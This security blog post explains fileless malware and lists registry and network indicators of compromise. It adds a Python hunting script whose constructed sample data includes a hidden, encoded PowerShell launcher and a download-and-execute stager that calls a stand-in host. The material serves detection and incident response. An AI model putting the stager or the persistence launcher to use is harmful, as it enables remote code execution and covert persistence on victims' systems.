August 9, 2017

Fileless Malware – Overview and IOCs

Jessa Gramenz

The first time I heard about the possibility of fileless attacks was in November of 2016. Less than a year ago, I was at the 2016 International Security Systems Association Conference in Dallas, Texas, when Jarrett Kolthoff gave a presentation on Cyber Hunt Operations. Kolthoff had an extensive government background before joining forces with Speartip. During his presentation, Kolthoff mentioned a new threat living in our working memory: fileless malware. I recall thinking back to my days as a computer forensics student, when we were always told not to shut off a device during a forensic acquisition because of the data living in memory. At a time when workstations and servers are kept running around the clock, keeping malware only in RAM is a smart choice for an attacker, because file-based antivirus and other disk-scanning security tools never get to see it. Instead of building custom malware, attackers inject existing tools such as Metasploit's Meterpreter and Mimikatz straight into the memory of running processes. Kaspersky Lab documented exactly this tradecraft in attacks on banks and other enterprises that were uncovered in late 2016 and published in February 2017.

What is fileless malware, and how does it work?

The technique itself is not new, but lately it is being used more widely by criminals, whereas before it was more commonly used by hacktivists. So now we have financially motivated attackers with better skill sets using a method that bypasses the file-centric defenses most organizations rely on. The attackers also count on the evidence of their activity disappearing when a user shuts down a workstation or a server reboots for updates, because the payload exists only in process memory and never touches disk. Where the attacker wants to survive a reboot, the only thing that persists is a small launcher tucked somewhere that is not an ordinary file, for example a Windows service or registry value that starts PowerShell with an encoded command, which then pulls the real payload back into memory. That is why the indicators below are registry artifacts and network addresses rather than file hashes. Once the payload is running in memory, it is a matter of how long it can stay resident and how much data the attacker can obtain before it is flushed.

What can we do?

Although these methods are not new, they are designed to escape detection, so the hunt has to start from the artifacts an attacker cannot avoid leaving: the persistence mechanism and the endpoints the payload talks to. Luckily, there are resources that list such indicators of compromise, including the registry artifacts Kaspersky published with its analysis:

  • Windows registry paths –
    • HKLM\SYSTEM\ControlSet001\services\ (a service whose ImagePath runs powershell.exe is the launcher that pulls the payload back into memory after a reboot; check HKLM\SYSTEM\CurrentControlSet\services\ as well, since ControlSet001 is not always the active control set)
    • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp (port-forwarding rules created with netsh interface portproxy; on most hosts this key is empty or absent, so any entry pointing at an unfamiliar address is worth chasing)
  • In unallocated registry space, i.e. strings carved from hive slack where the key structure is gone –
    • exe -nop -w hidden -e (the tail of a PowerShell command line: -NoProfile, -WindowStyle Hidden and -EncodedCommand, the last followed by a Base64 blob that decodes as UTF-16LE to the script itself)
    • 10.1.12/8080
    • 10.1.11/4444 (the two address/port pairs are the attacker's listeners; 4444 is the default port of a Metasploit handler)
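As an added example (not code from the original post, nor from Kaspersky or Endgame), the following Python hunts for the two registry indicators above in a saved reg query dump and carves the encoded-PowerShell pattern out of free text, the way you would search strings pulled from unallocated hive space. The registry lines, the service name svcPS, the host 10.0.0.5 and the payload are constructed for this example; the one rule the decoder relies on, that -EncodedCommand takes Base64 of the UTF-16LE script text, is PowerShell's real behaviour.

```python
# Added example for this post (not Kaspersky's or Endgame's code): hunt for the
# registry IOCs above in a saved `reg query` dump and in carved strings.
# Service 'svcPS', host 10.0.0.5 and the payload below are all constructed.
import base64
import re

# Constructed stager of the kind -EncodedCommand usually hides.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8080/s')"
# powershell.exe -e / -EncodedCommand takes Base64 of the UTF-16LE script text.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Trimmed output in the style of: reg query HKLM\SYSTEM\ControlSet001\services /s
SAMPLE_REG_DUMP = f"""
HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\svcPS
    ImagePath    REG_EXPAND_SZ    powershell.exe -nop -w hidden -e {SAMPLE_ENCODED}
    Start        REG_DWORD        0x2

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Spooler
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\\System32\\spoolsv.exe
    Start        REG_DWORD        0x2

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PortProxy\\v4tov4\\tcp
    0.0.0.0/4444    REG_SZ    10.0.0.5/4444
"""
# What `strings` might carve from unallocated hive space (constructed).
SAMPLE_UNALLOCATED = "\x00\x00?exe -nop -w hidden -e " + SAMPLE_ENCODED + "\x00..."

KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\.*$")
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")
SERVICES_RE = re.compile(  # accept ControlSet00N as well as CurrentControlSet
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\(?:ControlSet\d{3}|CurrentControlSet)\\services\\(.+)$",
    re.IGNORECASE)
PS_RE = re.compile(r"powershell(?:\.exe)?", re.IGNORECASE)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
ENDPOINT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})[:/](\d{1,5})\b")

def parse_reg_dump(text):
    """Return {key_path: {value_name: data}} from reg-query style text."""
    keys, current = {}, None
    for line in text.splitlines():
        if KEY_RE.match(line):
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(3).strip()
    return keys

def _decode_utf16_b64(b64):
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand in a command line, or None."""
    m = ENC_FLAG_RE.search(cmdline)
    return _decode_utf16_b64(m.group(1)) if m else None

def extract_endpoints(text):
    """Pull ip:port and ip/port pairs, the form the listener IOCs above take."""
    return [f"{ip}:{port}" for ip, port in ENDPOINT_RE.findall(text)]

def find_iocs(reg_text):
    """Flag services launching encoded PowerShell and any netsh portproxy rules."""
    findings = []
    for key, values in parse_reg_dump(reg_text).items():
        m = SERVICES_RE.match(key)
        if not m:
            continue
        subpath = m.group(1)
        if subpath.lower() == "portproxy\\v4tov4\\tcp":
            # netsh interface portproxy persists listen -> connect pairs here;
            # a workstation normally has none, so every entry deserves a look.
            for listen, connect in values.items():
                findings.append({"kind": "portproxy", "listen": listen, "connect": connect})
            continue
        image = values.get("ImagePath", "")
        if PS_RE.search(image) and ENC_FLAG_RE.search(image):
            decoded = decode_encoded_command(image) or ""
            findings.append({"kind": "powershell_service", "service": subpath,
                             "hidden_window": bool(HIDDEN_RE.search(image)),
                             "decoded": decoded, "endpoints": extract_endpoints(decoded)})
    return findings

def scan_blob(text):
    """Decode every encoded PowerShell launch in free text (e.g. strings carved
    from unallocated registry space, where no key structure survives)."""
    hits = (_decode_utf16_b64(m.group(1)) for m in ENC_FLAG_RE.finditer(text))
    return [h for h in hits if h]

if __name__ == "__main__":
    for finding in find_iocs(SAMPLE_REG_DUMP):
        print(finding)
    for script in scan_blob(SAMPLE_UNALLOCATED):
        print("carved:", script)
```

On a live host the input for find_iocs is simply the text of reg query HKLM\SYSTEM\CurrentControlSet\services /s (and the same for ControlSet001), redirected to a file; for a hive pulled from an image, feed scan_blob the output of strings over the raw file so that launchers whose keys were already deleted still surface. The decoded script is where the listener address shows up, which is why the example decodes before it looks for IP/port pairs.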

Endgame has also shared a great post about how enterprises can protect themselves from fileless malware.